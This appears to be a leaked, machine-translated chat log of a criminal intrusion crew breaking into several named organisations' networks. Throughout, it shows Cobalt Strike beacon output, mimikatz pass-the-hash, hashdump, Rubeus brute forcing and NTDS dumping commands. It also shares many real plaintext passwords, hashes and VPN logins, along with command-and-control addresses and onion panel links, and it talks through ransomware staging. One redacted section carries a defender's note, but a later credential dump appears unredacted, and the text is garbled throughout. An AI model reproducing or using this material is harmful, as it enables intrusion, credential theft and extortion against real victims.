@user7 `STAKC.local\sysadmin ff928c9f7bce0d834658c1436381494e` in which grid? Objects gettrunda have you checked the users by group?
almost 2120659 Objects gettrunda and not 30aOn the second network (mine) only 20+ pk in #snpartners-coma we have 30k pk in the network yes? well there on some cars LA are domain users more, LA only hashclir LA?those hashes as I understood not valid and LA we do not have? and only he alone on the key machines, and on other machines he goes through the local admin only 1 DA without a krede not go anywhere, got all the possible from those machines on which the ducked second network?here yes it's been a week without a declarationuffhough to one yes it's practice so droptestani)) did not try this "childproof" special when the POC is not completely usable* correct only if you're going to use POC directly from githab which does not contribute to it myself yet, if you can - share how you started) try it;- )you can to @tl1 =)))) on the working machines do not need to keep anything other than the "client" application, it is not a correct step to take them, it is better to have a separate VPS remote for thatspaskPack5156the same as wasminutka@tl1 have the ability to recognize the password ? ``` * Username : Linux * Domain : PKGPROD * NTLM : c40ce4eab245d09bead615fd67e59a77 * SHA1 : b6fc4dbe67cd7fcc4278a842803c0ff294098f57 * DPAPI : b4172b5b7931728b8f4abb6a6f85b2f2 ``Which service to stop? 
beacon> hashdump [*] Tasked beacon to dump hashes [+] host called home, sent: 82501 bytes [+] received password hashes: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: User:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b3b0692c09bb03d1e67fae2a98952a2f::: and where is the hashdumpdown result of the system? Most likely the av is fighting to run this utility. beacon> shell net localgroup Administrators [*] Tasked beacon to run: net localgroup Administrators [+] host called home, sent: 60 bytes [+] received output: Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator PKGPROD\Domain Admins PKGPROD\jess User The command completed successfully. Local admins what? passwords don't match beacon> execute-assembly Rubeus.exe brute /users:C:\ProgramData\user.txt /password:C:\ProgramData\pass.txt /dc:2K12SERVER [*] Tasked beacon to run .NET program: Rubeus.exe brute /users:C:\ProgramData\user.txt /password:C:\ProgramData\pass.txt /dc:2K12SERVER [+] host called home, sent: 320213 bytes [+] received output: Rubeus v1.5.0 [+] Valid user => Administrator [+] Valid user => linux [+] Valid user => micro [+] Valid user => micro2 [+] Valid user => mtsi [+] Valid user => PAC [+] Valid user => srivera [+] Valid user => timesavers [-] Done: No credentials were discovered :'( Wrong. It's okay.
User name jess Full Name jess Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 8/23/2019 1:08:43 PM Password expires Never Password changeable 8/24/2019 1:08:43 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 9/21/2020 9:55:17 AM Logon hours allowed All Local Group Memberships Global Group memberships *CatalogAccess *SalesAccess *InventoryAccess *Domain Users The command completed successfully. ``So wait, about Jess we're talking about hash has not changed, if the password has not changed the other thing set? ``Password changeable 6/13/2014 11:20:21 AM ``A password changed the logon 7/16/2020 2:06:23 PM ``Check if you changed ``net user ``a1fd693cdc0a22a5abede17e517df308 ``Where did Jess have a new hash ? ``` Authentication Id : 1 ; 467262273 (00000001:1bd9db41) Session : NewCredentials from 2 User Name : jess Domain : PKGPROD Logon Server : (null) Logon Time : 9/21/2020 9:00:27 AM SID : S-1-5-21-4059064934-1889560214-2984304678-1162 msv : [00000003] Primary * Username : jess * Domain : PKGPROD * NTLM : a1fd693cdc0a22a5abede17e517df308 * SHA1 : 490a64b492e39b2f40fcfc2472b702b619feab5e * DPAPI : 8e5b8c5beefe8319c0865ea259ad40af ``I think I'm doing something wrong. ``` beacon> mimikatz sekurlsa::pth /user:Linux /domain:PKGPROD /ntlm:c40ce4eab245d09bead615fd67e59a77 /run "net use * "\\192.168.168.10\C$" /persistent:no" [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Linux /domain:PKGPROD /ntlm:c40ce4eab245d09bead615fd67e59a77 /run "net use * "\\192.168.168.10\C$" /persistent:no" command [+] host called home, sent: 706119 bytes [+] received output: user : Linux domain : PKGPROD program : cmd.exe impers. : no NTLM : c40ce4eab245d09bead615fd67e59a77 | PID 33388 | TID 35340 | LSA Process is now R/W | LUID 1 ; 1028986815 (00000001:3d5517bf) \_ msv1_0 - data copy @ 000001FA427FBC20 : OK ! 
\kerberos - data copy @ 000001FA41E5A6A8 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000001FA41DB24E8 (32) -> null ``Checked this password with other domain admins? --- Chromium Credential (User: jess) --- URL : https://cw.shipandsave.com/ Username : PKGPROD@ASCENTGL.COM Password : RATER100 --- Chromium Credential (User: jess) --- URL : https://rrts.mercurygate.net/ Username : PKGPRODUCTS@ASCENTGL.COM Password : RATER100 --- Chromium Credential (User: jess) --- URL : https://workforcenow.adp.com/ Username : Jessikinha777. Password : Just in case: don't forget to remove Linux from the brutadata list, let's go the usual way we have a pass with a single YES check other domain admins for this password check how many attempts on this username's wrong password, I didn't get it +@user5 in your team? You guys are nearby, don't you communicate?) I thought I was the only one who wouldn't use it, but everyone did user2-2 beacon> shell net use * "\192.168.168.10\C$" /persistent:no /user:PKGPROD\Linux Pack5156 [*] Tasked beacon to run: net use * "\\192.168.168.10\C$" /persistent:no /user:PKGPROD\Linux Pack5156 [+] host called home, sent: 106 bytes [+] host called home, sent: 19 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. You still have about two more tries to try if it doesn't fit, it will break the account) user2-3 beacon> shell net use G: \192.168.168.15\C$\temp /user:PKGPROD\Linux Pack5156 [*] Tasked beacon to run: net use G: \192.168.168.15\C$\temp /user:PKGPROD\Linux Pack5156 [+] host called home, sent: 95 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. 
user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\Linux Pack5156 [*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\Linux Pack5156 [+] host called home, sent: 95 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150 [*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150 [+] host called home, sent: 98 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. ``Does anyone read the conclusion? user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150 [*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150 [+] host called home, sent: 98 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. ``The pole is fine and there was no foul play on his part because ``` Last logon 7/16/2020 2:06:23 PM ``lol)he just didn't press ``rev2self``@user7 try net use with the YES creds on dcwhy do you get different output from the same command? beacon> shell net user Linux /dom [*] Tasked beacon to run: net user Linux /dom [+] host called home, sent: 50 bytes [+] received output: The request will be processed at a domain controller for domain pkgprod.local. 
User name linux Full Name Linux Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/12/2014 11:20:21 AM Password expires Never Password changeable 6/13/2014 11:20:21 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 7/16/2020 2:06:23 PM Logon hours allowed All Local Group Memberships *Administrators Global Group memberships *Group Policy Creator *Domain Admins *Enterprise Admins *Domain Users *Schema Admins The command completed successfully. ```shell net user Linux /dom have a problem with the session on the dk? Yes, I see, I didn't notice)`` It's written there, but thank you)`` kerberos : * Username : Linux * Domain : PKGPROD * Password : Pack5156 the question is why is it better to hurry up the question is why YES came, mb anomalous activity and will reboot yes, it is better to jump to dk first? then dump the ntdslol)and from where? which way? got the password from yes ``` Authentication Id : 0 ; 680664956 (00000000:28921f7c) Session : NewCredentials from 2 User Name : jess Domain : PKGPROD Logon Server : (null) Logon Time : 9/18/2020 9:26:21 AM SID : S-1-5-21-4059064934-1889560214-2984304678-1162 msv : [00000003] Primary * Username : Linux * Domain : PKGPROD * NTLM : c40ce4eab245d09bead615fd67e59a77 * SHA1 : b6fc4dbe67cd7fcc4278a842803c0ff294098f57 * DPAPI : b4172b5b7931728b8f4abb6a6f85b2f2 tspkg : wdigest : * Username : Linux * Domain : PKGPROD * Password : (null) kerberos : * Username : Linux * Domain : PKGPROD * Password : Pack5156 ssp : credman : ``user5 you do not pull servers in coba before the shutdown @user4 coba in ls@user3 to @user8 byeHello all :space_invader:helloTill what time? Yesterday I read something about it yes, there is a skul server, in powerupsql says that should [machine]/instanseName specify...talk about spns? 
There is a thought to poke the skul, but do not know how to learn the name of the instanse object? or to test from msfas is meaning to find additional modules all patched not to attack but to scan YES not taken? The day before yesterday changed passwords, deleted unnecessary YES. Nashuemel maybe why were burned? groups can write through #stanthonyskc-com more `stanthonyskc.com` STAKC in the works, but there we are probably spalichto us in the workspanki hoihi Prievest who? 7dfa0531d73101ca080c7379a9bff1c7 P@ssw0rd123! 62e68029812e6498197aaa32824c183e P1v0t@l 25228f174278a82e7202a25df2d9923b Operator2010 Dump these hashes 7dfa0531d73101ca080c7379a9bff1c7 62e68029812e6498197aaa32824c183e 25228f174278a82e7202a25df2d9923b like a strange dc in the UK domain I dumped his sysinfo into toolspanel the new dll crashes there as well, but it doesn't show up on the AB >dNSHostName: DCWAS45.Wilsonart.com >description: Symantec End Point Management Server Ping statistics for 170.7.76.245: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), >dNSHostName: FLWAS03.Wilsonart.com >description: PROD Symantec AntiVirus Management Server Ping statistics for 170.7.20.198: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss) I'm coming to the group in the TV, if anything Deb who did not come? we group created by the boss and added depa there. and now he does not respond there I sent you two times have you written to depa? in shelter, there's nothing to gather (we need to solve something with dll - simantik chopped, so we can not get through to about 4 or 6 other domains (only 4 domains want to get through))) today do not want to close? how are you doing? it's in cmd /c they're next to each other, it makes no sense i've tried it that way `remote-exec psexec 170.7.76.170 cmd /c C:\Windows\Temp\7za a ntds-eu.7z C:\Windows\Temp\ntds` No one knows what's wrong?
paths are relative. French2014, please send me more of this hash. fd20144890966cfb2300ec6629249cab pip install impacket pip install pycrypto pip install pyasn1 apt-get install python-dev all files are placed in the same folder together with the script, there will be 4 secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local Where is the error here? remote-exec psexec 170.7.76.170 cmd /c C:\Windows\Temp\7za a ntds-eu.7z ntds ntds-eu 7z ntds also bypassed no, haven't tried that. I mean the load on port 80 in the coboo is absent on port 80 have you tried that? -and bind by psexec through normal psexec? neither in coboo nor in msf doesn't fly through would be so easy. in that domain 80% of the servers on 2003) and whatever 2003 just hashdump make dc on 2003? I don't think so. ntdsutil ntdsutil "ac in ntds" "ifm" "cr fu C:\windows\Temp\ntds" q q did it ever work on 2003? Dell@2020 4bcba61efb7ce5e848ec339394829572 @tl1 throw in the Kmd5 unpacked ukwadc01.uk.wilsonart.com [170.7.70.214] answer - no it's not possible to mount dkprosto clarify if the question stood up @user9 a misunderstanding came upa forget it, I confused you didn't understand where dk todk in the group of crits servers) yes to him) ah, I thought you about the second domain))) and the question was to @user8) well mount dk not need all the same mb... ) I do not understand) well dk sees) external servers see? what edr? HQTAS73.Wilsonart.com DEVBIOBI.Wilsonart.com well there is and there is, the main thing when you come inno place search for a place to run there are many where the folder yes there is if not then do not throw? for example, backup, veeam, production ...
and also the server is not in the crits group of servers possible more rules to select the server under the percis on the server is started by the system and is run by the staff masked in the folder system32 schtasks /query - check whether the stack was created after the execution (dll creates the stack after launching) delete the task which was launched Server is selected where there are no active YES and EA processes and where YES or EA have not visited for a long time (check users folders for date of change) the server does not belong to a crisis group of servers, for example, backup, veeam, production ... people responsible for the forum, then move there@user9 please describe here for all do not remember the rules will do? if you think I do not interfere) would give the go-ahead that remember would immediately throw another thing the rules we remember, so brainstorm the same on the second network help guys just asked a question and silencea where did you get them?) or your own? and you give us them?) rules remember? drop a couple of dllnet here do not drop, right? `VMware vCenter 6.0 Server DCWAS79```` >description: Symantec End Point Management Server >dNSHostName: DCWAS45.Wilsonart.com >description: PROD Symantec AntiVirus Management Server >dNSHostName: FLWAS03.Wilsonart.com >description: PROD Symantec AntiVirus Management Server Directory of C:\Windows\Temp\ntds 12/23/2020 06:00 PM . 12/23/2020 06:00 PM . 12/23/2020 06:00 PM Active Directory 12/23/2020 06:00 PM registry 0 File(s) 0 bytes 4 Dir(s) 55,007,834,112 bytes free The current time is: 13:19:19.88 It's the middle of the day, right? Yeah, let's hope that everything was successful all offeshas still check the area, if available ready) yes it's not clearav switched on?Z1NPS1 - linux, Z1SDEPLOY - no file is not cheknu other hell is there, but the token worked as razvfail? Z1AD3: 192.168.1.41 - this dkeesh not looked, now domain authorization? 
Z1AGILITYAPP: 10.10.0.17 Z1SDEPLOY: 10.10.0.57 Z1INFOLINK: 192.168.1.224 Z1AD3: 192.168.1.41 Z1CA1: 10.10.0.5 Z1NPS1: 10.10.0.56 ``` This is what's online now, I'll take a closer look at the tops and check if all servers are ok/not ok other servers check domain3, what kind of delays they have left? 57 servers pinged, 67 in total. 41 pulled in, 9 lines, 7 mapped disks. 140 armies pinged - 278 in total managed to ping 40-45ox now or did the end of the day coincide and all the armies went offline) if the servers reboot and the build does not finish the work all will fuck up a little bit armies all put the new mappings servers we probably disabled win-def and av we got burned, changed some people's passwords we started to unhook the armasmas mapped two of them?) it was their own doing) check it out then start 10-15 pcs and started right away? at the last stage of the armas mapped you did not start? we all pulled the server to start laying it out so We've been burned. We're pulling servers, we're mapping armas. How's your progress? [+] received output: 192.168.20.129:445 (platform: 500 version: 10.0 name: CF-RPA05 domain: CEDARFINANCIAL) [+] received output: 192.168.20.110:445 (platform: 500 version: 6.3 name: CF-HQ-RADIUS domain: CEDARFINANCIAL) [+] received output: 192.168.20.109:445 (platform: 500 version: 10.0 name: CF-HQ-DV domain: CEDARFINANCIAL) 192.168.20.113:445 (platform: 500 version: 10.0 name: CF-RPA03 domain: CEDARFINANCIAL) [+] received output: 192.168.20.125:445 (platform: 500 version: 10.0 name: CF-RPA02 domain: CEDARFINANCIAL) Scanner module is complete [*] Checking for MS17-010 vulnerability on ip:192.168.20.129 [+] host called home, sent: 3021 bytes [+] received output: Connecting... [+] received output: Connection Error: connection to port 445 is denied ``and this is my admin BLEEP! 
he has a directive to keep our projects as a priority Nee still very much missedPanel I understand that the current admin went head to head with the teamlid on their projects Where?) it seems that we need to look for a new admina with Tore as I think it's better done with clearing can find on the dns what anomalies bots reserchers or who knows what the fuck tied to direct access through the domain only there is a simple logic from my side and do not see advantages in torebo do not like lagi subjective truth I prefer clearing all different say can you consult with your on this issue? I don't know if it makes any difference to us) I'm kind of thinking the same thing, maybe in our case, tor = clear for the feds if you move to clear you need to remove all external data in case of removal of the so vyrobno so nauseating) me in fact torav tor3 different sections with a full page load to make adjustments + available admins give the rights to the case there yuzabili not very))) I looked in the ehe all fuckin naponavlena everything where my domains all appeared not only the admin? i see... see... read... cry.... not different but i can only see admin in yours all fuck it, my ass is on fire can i add them to mine if they are not different do i have to prescribe them for all my users?
which lusthope/periodprescribed you have a parameter only for admin listen nothing flies (put them as soon as you read them also put them in the brute force section through edithttps://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/uessparameter domain and select their polzakov, do not forget to limit the period and lusthonvyvy choose here edit opposite the anchor (dll,ehe) - confighttps://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/тооІѕрегаешь their domains herehttp://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/distinopagesa please tell me how to set my users in the toolpanel so they can generate anchor? try somewhere else to put the blocker in the wayFolder: \Microsoft\Windows\BitLocker TaskName Next Run Time Status ======================================== ====================== =============== BitLocker Encrypt All Drives N/A Ready BitLocker MDM policy Refresh N/A Ready I'm doing a search for HQ # and can't find it.rundll32 C:\Users\Dorinda.alredge\appdata\roaming\Adobe\cache.dll,Control_RunDLLdll is not in place of the stack not run like that? beacon> shell rundll32 C:\Users\Dorinda.alredge\appdata\roaming\Adobe\cache.dll entruPointda where? we have in the common rocket? which ankbekdorpishi in the channel directodomen changed to their vindef not palitaga ok who is responsible for admins? on mine no httpsspass thanks)you're welcome)i can drop dead bots from their zakrepov koji 93 pcs?aha okekpost update on tulspaneli poured immediately on the check them to their own then https://dyncheck.com/scan/id/1e37fc86492658d48561c7e4f69eb3cdmme the domains have given one check updates) ahaaerezalizayut in tulpanel? tookhttp://dyncheck.com/scan/id/7bd312303566339897552de90bf1c560within tulpanelikor who?vindef palitz all fucked up //dyncheck.com/scan/id/c986a3c2ff98cc338cc1d58c9db9c000cncnc for today then these 2 then? but it's a long time at bentley will take mine) think not)levf. 
ytn0 just if i kill you will work differently took these 2 Tell me if I don't kill your domains? I'll take these 2 then on my admin panel I have it written down that these domains are mine. muncuc.com farfaris.com homilistana.com omelezatava.com fikjtyun.com jetbiokleas.com nyhgloksa.com onvegokaue.com ``I understand the second link on the second ank'' muncuc.com,farfaris.com omelezatava.com,fikjtyun.com ``How the fuck should I know?'',omelezatava.com,fikjtyun.com Which ones for the office? These are yours for the main one``` DOMAINS muncuc.com farfaris.com i used to attach these domains to your domains remember? you alive? i think i'll attach them on the fly? i'll debug this shit, i've been working on it for 24 hours, i had problems with launching the dlltams, i figured out that only 3 servers are catching form on the first day on all 3! [+] Location: C:\windows\temp\MRT\* Size Type Last Modified Name ---- ---- ------------------- ---- 205.6KB fil 12/27/2020 17:43:59 vminst.dll fil 01/19/2021 06:30:24 vminst.log `````` Directory of \ovrscweb1\c$\windows\temp\MRT 01/19/2021 03:51 PM 0 vminst.log ``o_o``. Directory of \ovrscweb2\c$\windows\temp\MRT 01/19/2021 03:47 PM 0 vminst.log 1 File(s) 0 bytes 0 Dir(s) 68,013,015,040 bytes free What's up there? What the fuck's up in Overlander? They're just buying access from all sides? fuck it go to # palyoad the fuck up # and work as a cobo. https://mydesktop.kingston.ac.uk/portal/webclient/index.html USER: k1945880@kingston.ac.uk PASS: Thanzeeh77 ``` And also YUK university also think it is worthwhile now to go on the rdpveb? purely to get a license and to get fixed "in the desk" this university it is unlikely that there should be difficult, but pick someone try to go up```. https://vpn.umontreal.ca/dana-na/auth/url_default/welcome.cgi USER: p1204216 PASS: Des99714 so it depends on the outcome of the decision. do you want to take the job? 
I'll mark which are the priority to open, what will open) Revenues don't give a fuck anyway, ok + esfox_com_ad_users.txt. I honestly have a hard time collecting; you can sign revenues if you have them in this format, it will pass) esfox_com_ad_users.txt tell me how to do it) esfox_com_636kk.txt will it be ok in this form? ok I'll do it. Yesterday I spent most of the day collecting files from the confiessional; since we'll be moving the files I'll just parse them already) Well, reopen where? Also pass the work to globalmarkstatik, I'll do it now. I'll give it priority, just sign the domain in the file name; do they need only ad_users? I'll dig through my archives at the same time, I have something with NTDS, I think I'll give it to you to reopen tomorrow? I thought maybe I could reopen it today, but it didn't work according to beacon logs? The idea failed, and I don't have the listing, I don't have the log files from the machine; they don't give a fuck about the trick, we had a file listing, we just uploaded the assembled file to mega with the size of the listing, but with the locale format to merge the database I can't get back there; there people are ready to pay for the data. I did not download from an important case, serious, I had a fuckup here((( there is a lot of fucking stuff to do) Why aren't you asleep? I'm not going anywhere. 3 hours, that's no time at all. When you're done with your chores, we'll probably run through some more. Yeah. Patch on a particular hole, I still have to prepare files to reopen. Advisory? Yes, not patched, so straight away there was no advisory ... already released a patch that lisoniki chet sploit glitchy, it fixes, soniki wait? That's it, like that ...
I'll do the brute from globaltranzav, five kovyty her) grid on lardbilimora. You have anything to work with today? I can't remember anything else))) mmmmm deadline for tomorrow, it's already been ordered by the augabrooks and kermit guys, there's cobalt testing to be deployed. Ehhh I got lost, can you remind me of my tasks now; it'll be weird, we wrote yesterday, so I'm taking tomorrow's deadline. Listen to this, there's gonna be a download soon, right? Fuckin' great, I'm just sleepy. How's it going?) Hi there, tomorrow by 12:00 + retif.com, plzbukkammer, no one's got any web UI 2FA + please add it to me; so far only adinfo has time to throw out of there fast. That's where, yes.

grantweber.com I checked everyone in the first one, no one has any bookmarks. In the second, without 2FA, go through the client, it almost immediately throws you out, but more people seem to move?

[+] Checking URL https://[victim IP redacted] [+] Found old SMA version (<9.x) [+] Appliance running version 9.0.0.2-13sv [+] Leaking sessions to dump configuration.

[Tool output redacted. The tool went on to list 23 leaked SSL-VPN sessions (SessionID, userType, userName, plaintext Password, Domain "retif"), replayed one of them, saved the appliance configuration to ./Dumps/<ip>/config.sqlite, found 78 users, recovered one Active Directory administrator credential for an internal host, found no LDAP or RADIUS credentials, and parsed the bookmarks: terminal servers and user desktops on retifnet.retif.com, all listed "without creds (Uses the same creds as the sslvpn login for the creating user)". The usernames, passwords and internal hosts are not reproduced here.]

"and there's also one more crack in the works right now."

[+] Checking URL https://[victim IP redacted] [+] Found latest version (9.x+) of SMA appliance [+] Appliance running version 10.2.0.1-18sv [+] Leaking sessions to dump configuration.

[Tool output redacted. 42 leaked sessions with plaintext passwords (domains Beyond, Impact and Sales; most passwords were the company name followed by a year), 88 users in the config, the same Active Directory administrator credential repeated against several internal hosts, no LDAP or RADIUS credentials, and a long bookmark list: departmental file shares, an "Impact" application host, Akcelerant web, database and test servers with stored sqladmin/administrator RDP and SMB credentials, a DAKCS Beyond host with a stored root SSH credential, backup and install shares with the domain administrator password stored, and dozens of per-user "Connect to your pc" RDP bookmarks, many with the user's own password saved in the bookmark. The point for defenders is that an SMA config dump is not just a list of VPN users: the credentials stored in bookmarks and in the appliance's AD authentication settings are a direct path into the internal domain, and passwords reused between the VPN login and the RDP bookmark appear side by side in the same dump.]

Till 12 plus/minus. All 3 in the shit? They're already pretty used by TV, but okay)) Yeah, right))) There are three more from Friday. Like you, at 0? Do you have coba? Take it?

[+] Checking URL https://[victim IP redacted] [+] Found latest version (9.x+) of SMA appliance [+] Appliance running version 10.2.0.0-14sv [+] Leaking sessions to dump configuration.

[Tool output redacted: leaked sessions for domain CANALBARGE with plaintext passwords; the dump continues past the end of this section.]
Domain: CANALBARGE [+] Found: SessionID: 7YA1Bbya5MRWbmtI7jQDTuCFpNr3TP0z7IZx21i7HXk= userType: 1 userName: gcalvillo Password: Lali022315 Domain: CANALBARGE [+] Found: SessionID: 81QtVcg20XnqLBycgw0H709ZpGKXKyFxRfv3gNFwB0M= userType: 1 userName: jturner Password: Pe@ches_!!# Domain: CANALBARGE [+] Found: SessionID: ALZ3k7QjO81pgnMp1YtD08SHOZE8QVDW90O9VORUvkM= userType: 1 userName: tknight Password: CBCdispatch97 Domain: CANALBARGE [+] Found: SessionID: GXK01m2Etj8y21LW3cYF0MpcyqxgEhKq21QvKkPx34E= userType: 1 userName: dhysaw Password: Vinger110106 Domain: CANALBARGE [+] Found: SessionID: HOlgsgsrlafclFRwWLx1eIg2eYApSN3pGIcbizsJXFg= userType: 1 userName: mcampbel Password: Wrc1129** Domain: CANALBARGE [+] Found: SessionID: NTkdkB29z1ZQ08GTBZ4zMfUnoHeC8PIqs9MQ5khx4Co= userType: 1 userName: bbarrere Password: @BnBe19310918CB2 Domain: CANALBARGE [+] Found: SessionID: Q072oyaSMM6DTm1Z63Rv4mFIZCy7SbSf1zsxUlCgplM= userType: 1 userName: kcamp Password: KC2020cbc Domain: CANALBARGE [+] Found: SessionID: QAhh9tF6cM3n5ifnj8vQBZ67JWzbZl2GT8EHJhhuF7Y= userType: 1 userName: ccatalan Password: CC6013cbc1986 Domain: CANALBARGE [+] Found: SessionID: QwRMW03QsuEUsKGpfNIraSL1YDXVaxgv28n0U5e18Q8= userType: 1 userName: sespinoza Password: 0306!Jessica Domain: CANALBARGE [+] Found: SessionID: Rx0VXlABY6z7akQcpBgjA9l7CF11QWT1Cm5tvvvBr98= userType: 1 userName: tkish Password: TJball44!!! 
Domain: CANALBARGE [+] Found: SessionID: S14OBRRWdwgNN18yL6W6WClFDN0Wu1ZKGKeuG9I0pR4CA= userType: 1 userName: ttoups Password: TOTcbc1987 Domain: CANALBARGE [+] Found: SessionID: a8cbVmuMbdiLvi1vihNYw3a8ccWoAq6QCxzCYEDeAxiMo= userType: 1 userName: rblanchard Password: Scottieb72985* Domain: CANALBARGE [+] Found: SessionID: fwgzABLIR1cfsBeDPA3CbAPQYKfK4f6RS9H2Qmq6x4U= userType: 1 userName: bwondolowski Password: Traffic2262 Domain: CANALBARGE [+] Found: SessionID: klh5xtYgFH7mynHLcz3c0Ah2H4rtdLUGkCyngUsrPeQ= userType: 1 userName: jreyes Password: God&faith* Domain: CANALBARGE [+] Found: SessionID: o3I1l3SxuvwPhyNxdf9kUDAIUjHNJJqGfzTbuG3TQxY= userType: 1 userName: slohja Password: Uwo16Uit Domain: CANALBARGE [+] Found: SessionID: t3fe0eWXhK7po1NFPp91aHk0oWLkaxMiRkdjxgwiA4E= userType: 1 userName: tmerrick Password: SAdie*$)pup5geaux Domain: CANALBARGE [+] Found: SessionID: tsrxhNflmtcBJ5WYaJEiLQubk9YjWrauMksnaOrW1UU= userType: 1 userName: jmaynard Password: Jm120113!!3 Domain: CANALBARGE [+] Found: SessionID: ylrGw1eBBh1ocAYKzymIB2oKDGSHvpuv3FQzgwL0WCQ= userType: 1 userName: bhulin Password: Joseph1959!@ Domain: CANALBARGE [+] Found: SessionID: z2zpQ7tyFfBQdFnQr7ICr7igVCx08u1qAjbTuORdFvQug= userType: 1 userName: jballard Password: JB$Williesmuckers1 Domain: CANALBARGE ``@tl1 today until what time? @user4 sayspngcpower failedpngcpower nothing to work with so you have nothing to work with? or is tv poking around? new sessions will be @tl1iandreevsnikitenkostalinottl2tl1admin ====== NetworkShares ====== Name : ADMIN$ Path : C:\windows Description : Remote Admin Name : C$ Path : C:\ Description : Default share Name : IPC$ Path : Description : Remote IPC `````` Domain : UKHECSLT3028 Login : Administrator Password: 192837465S! 
NTLM: f490c4823837a7d002e0176f3c5203ad
Domain: MATCHES Login: mercedesd Password: Dinham2323 NTLM: 7c839aa54221edb65e959f18ab9bde41

We set up a timeserver, we will try to pierce through it and mark from your packs what got attracted that not on 100 in 2 and 3 77da we split uzhetudah draw the remaining 77
@user7 in my opinion skidyvalem 3 kobut to servers moremozhet randl leave in the attracted immediately into the system to jump or yet do not care?
hz, why did we make them? so why piip if the normal one opens? piip opened with a dll that you were given? opened?
*** initial beacon from tylerservice *@10.0.61.53 (SHAREP-WEB1)
I wrote above :confused:
+catchy comment? tuta ya
what the fuck is this first 100 fly to 185...113 to 100 servers second 100 to 199....166 without, where not attracted then C `10.0.61.53` with pip? give the server for example which is not attracted is 300 scoreenu +- so it is not 200
yes
yes there only one was needed then. the rest just did not close
277 servers? why not vinlogon?) hz, so it happened) in kobegde? rundll32 ? a question, why so many rund processes? and also let's draw what is drawn
admin.sisd.k12 and here we have a basis of 200 servers? no with 15 is sisd.k12 they are at user7 so this domain with 15 pc? I have all sessions only on admin.sisd.k12 it does not on another domain sessionset domain )))) is it? 976 what is the session in the main domain? the other 2 where it is allowed to go then change the kobe Then all the kobe is not available? I have only succeeded in my login is there any new kobe? not one to connect, no net pings to the ipe koba?
we have some shit with the network has not helped try to reboot the pc just in case most likely it's the connection I work with sessions last does not change I now in neikoba itself hangs still not let?
can not rejoin, and the guys can not go either
qwqe rejoin my koba hangs give me a list of cleared admins kreidenschmuck
@user4 vmic also does not work? i'll take it into account
1 nickname on all kobas also do not roll without repetition transcripts and stuff nicky russian characters what else does not roll? transcript also do not roll
He is your idol? why?
3796 and lukashenko also do not roll
aKiric? do i really need to explain?
12/08 17:50:20 *** Lukashenko has joined.
?What bikon is it?
@tl1 are you talking about? ?What bikon?
104.194.11.10:50058 ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
moyanet. 199.127.61.166:62452 VHF2006g5jTldA0KSp9N8y3zkvmxLuSq4bS
is it deleted? check it out. x64 hopefully? my coba
185.150.190.113:61718 O5xFflqqDG7LDQJUDbdtkj54zQ8QDVMMI0W
Figured it out. windows executable(s) and how did you get it if you can not see? in payload generator do not see this listener and throw here access to the two cobbs in which we will work some shellcode on this bindpipe and here bindpipe see? now check the current dll dll start and delete it. or it's averts tear - I don't know. but the session does not come, traffic, even chet? about the not attracted found out why?
since you have not found the admin will have to) and you asked why attract them)) I told you, very few people are attracted...
when you pull all 200 servers, according to the classics migrate to the system process give access to the other colleagues in these kobytoy in 2 kobytoy spread po 100 on kobuna all 200 servers throw sessions in the kobyu we have 200 servers and 4000 Armory do the following, since we have not found the admin YDR everything will have to do by hand
Build will be 3 files: exe, dllx64, dllx86
okay then move on
+++++
da like done done not finished yet?
on the spot now reboot the machine hangs + wait until everything is done nothing will explode) menu will pop up until you zabmitmitmit its contents it is there) press nothing will explode? dllinject item not visible in the menu the more you leave time for a briefing the more counter questions will be answered and then you yourself will do everything will explain strategy to close not delayed
ok
+
I do not need to clean up and download 2? 3/5
fdsitgjeieyda, tok I did not skidkode, now
@all write down who is here? ah, then all of you now install in the coba and all the use kizakimog do it in the general? you have done - write down what you have done - I give you the task as above work in this format, put in the coba new cna files
SFHU*G&674wEsfI&^WR
user3 user9 4273 how many user pc's do we have?
it's on dk in admin.sisd.k12
11:20 AM
Snap the time here on the server and send it here
+
it's the contents of the file, actually

```
TicketByteHexStream :
Hash : $krb5tgs$23$*certsrv$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com*$…
SamAccountName : certsrv
